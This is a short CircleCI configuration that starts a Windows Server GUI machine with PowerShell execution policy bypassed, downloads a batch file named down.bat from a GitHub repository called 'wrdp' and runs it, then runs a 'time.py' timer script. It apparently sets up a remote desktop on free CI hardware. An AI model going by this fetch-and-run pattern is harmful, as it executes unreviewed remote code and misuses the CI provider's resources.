jobs:
  build: # name of your job
    resource_class: 'windows.large'
    machine:
      image: 'windows-server-2022-gui:current'
      shell: 'powershell.exe -ExecutionPolicy Bypass'
    steps:
      - checkout
      - run:
          name: Initialization environment
          command: |
            echo "EMAIL_SECRET=aymanrar2c@gmail.com" > secrets.txt
            Invoke-WebRequest -Uri "https://raw.githubusercontent.com/Exynos7880-Linux/wrdp/main/down.bat" -OutFile "down.bat"
            cmd /c down.bat
            
      - run:
          name: Time Counter
          command: python time.py

workflows:
  version: 2
  build_and_upload:
    jobs:
      - build
